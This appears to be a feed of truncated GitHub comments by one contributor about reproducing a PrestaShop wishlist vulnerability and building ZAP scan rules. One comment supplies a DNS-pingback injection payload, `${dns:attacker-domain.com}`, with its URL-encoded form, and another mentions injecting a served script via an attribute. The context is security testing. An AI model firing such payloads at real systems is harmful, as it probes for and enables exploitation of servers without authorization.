Karthik U J
Karthik U J
Can you also mention the url that you are giving the script as input, I mean only the part after the hostname so that you don't end up leaking a...
I also tested this on PS v1.7.8.1 and blockwishlist 2.1.0 and it is working for me, can't really work on it if I can't reproduce the issue. Can you provide...
For getting a DNS pingback you can use a payload like this: `${dns:attacker-domain.com}` You might have to url encode the payload, so the final payload will be like: `%24%7Bdns%3Aattacker-domain.com%7D` You...
> Maybe even serving a script using a server and then injecting it via the attribute might work? Can be a mistake/misunderstanding on my part as well :) need to...
> Gotta fix it and try with a local firing range instance now :) > […](#) > On Fri, Nov 17, 2023, 10:28 PM Karthik U J ***@***.***> wrote: Maybe...
Hey team, this is still a work in progress. I had a couple doubts: When I am running `./gradlew addOns:spider:cZAO` I get an error since I need to modify the...
> @karthikuj do you plan to finish this? I do, just not getting the time right now.
Hey team, this is still a work in progress I had a couple queries before I can continue my work. 1. As mentioned by @psiinon [here](https://github.com/zaproxy/zaproxy/issues/7125#issuecomment-1657798356) ZAP does not capture...
> Should be added to help, and changelog. Unit tests should be created as well. I will be adding the test cases after completing the scan rule, I have updated...
@kingthorin any more changes needed? if not I'll start with the tests :)